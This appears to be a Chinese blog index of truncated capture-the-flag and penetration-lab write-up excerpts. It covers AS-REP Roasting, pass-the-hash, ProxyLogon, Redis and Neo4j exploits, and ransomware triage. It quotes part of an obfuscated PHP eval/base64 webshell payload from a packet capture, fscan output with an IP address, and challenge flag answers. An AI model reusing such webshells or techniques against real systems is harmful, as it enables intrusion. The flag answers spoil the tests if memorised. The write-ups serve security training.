Wireshark查看流量包内容发现 1pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WS

难度：easy，没啥意思。文件上传拿 shell，再利用 Erlang 加载的 OS 模块命令执行

Neo4j CVE-2021-34371，sql 注入，AS-REP Roasting，SIDHistory，哈希传递

Fastjson+JDBC，Exchange 服务 Microsoft Exchange Proxylogon 利用，WirteDacl 权限，哈希传递攻击

【任务1】勒索环境溯源排查12题目描述上机排查提交病毒家族的名称，可访问应急响应.com确定家族名称，以flag{xxx}提交 首字母大写。 1flag{Live} 【任务2】勒索环境溯源排查12题目描述提交勒索病毒预留的ID，以flag{xxxxxx}进行提交 1flag{170605242653} 【任

Redis 主从复制，CVE-2021-25003，mssql，S4U 伪造 信息收集fscan扫到了几个东西，ftp 匿名登陆，Redis 未授权访问 123[+] ftp 39.98.116.201:21:anonymous [->]pub[+] Redis 39.98.116.201:6379 unauthorized file:/usr/local/redis/db/dump.r

WebezDecryptionf12 找到 hint，第一关验证码为 2025 抓包修改数据包直接跳过第二关 查看 js 代码，发现有 jsFuck 加密和 base 加密 1234567validateCode: function() { // 这里包含验证逻辑 const _0x1 = [][(![] + [])[+!+[]] + (!![] + []

不得不说这次题量有点大

Windows 实战 - emlog & evtx 文件分析

AS-REP Roasting、WordPress RCE、RBDC、CVE-2022-26923